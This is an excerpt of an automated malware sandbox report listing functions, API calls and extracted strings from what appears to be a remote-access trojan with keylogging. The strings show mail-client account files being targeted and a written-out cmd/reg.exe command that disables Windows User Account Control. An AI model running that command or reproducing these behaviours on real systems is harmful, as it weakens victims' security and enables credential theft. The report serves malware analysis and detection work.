                                                                        Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                        • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                        Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                        • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                        Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                          • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                          • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                          • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                          • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                          • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                          • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                        • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                        • API String ID: 4036392271-1520055953
                                                                        • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                        • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                        • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                        • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                        Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                        • wsprintfW.USER32 ref: 0040B1F3
                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EventLocalTimewsprintf
                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                        • API String ID: 1497725170-248792730
                                                                        • Opcode ID: 79592d734cdee8dd8f16df52a96ec572deaeb03d5d238ed8b569f41c59cd1f5a
                                                                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                        • Opcode Fuzzy Hash: 79592d734cdee8dd8f16df52a96ec572deaeb03d5d238ed8b569f41c59cd1f5a
                                                                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                        Function 00443A33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0;U
                                                                        • API String ID: 0-4237915841
                                                                        • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                        • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                        • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                        • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                        Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                        • String ID: XQG
                                                                        • API String ID: 1958988193-3606453820
                                                                        • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                                                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                        • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                                                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                        Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                        • String ID: 0$MsgWindowClass
                                                                        • API String ID: 2877667751-2410386613
                                                                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                        Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                        • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                        • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                        Strings
                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$CreateProcess
                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                        • API String ID: 2922976086-4183131282
                                                                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                        Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                        Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                        • String ID: KeepAlive | Disabled
                                                                        • API String ID: 2993684571-305739064
                                                                        • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                        • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                        Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                        • String ID: Alarm triggered
                                                                        • API String ID: 614609389-2816303416
                                                                        • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                        • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                        Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                                                        Strings
                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                        • API String ID: 3024135584-2418719853
                                                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                        Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                        • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                        Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • _free.LIBCMT ref: 00444E06
                                                                        • _free.LIBCMT ref: 00444E1D
                                                                        • _free.LIBCMT ref: 00444E3C
                                                                        • _free.LIBCMT ref: 00444E57
                                                                        • _free.LIBCMT ref: 00444E6E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 3033488037-0
                                                                        • Opcode ID: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                        • Opcode Fuzzy Hash: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                        Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                        • _free.LIBCMT ref: 004493BD
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00449589
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                        • String ID:
                                                                        • API String ID: 1286116820-0
                                                                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                        Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                          • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2180151492-0
                                                                        • Opcode ID: 0b43284b76afbd96f76b9be0043a8eca87360fa06686d1bf4d8bb099c383738a
                                                                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                        • Opcode Fuzzy Hash: 0b43284b76afbd96f76b9be0043a8eca87360fa06686d1bf4d8bb099c383738a
                                                                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                        Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
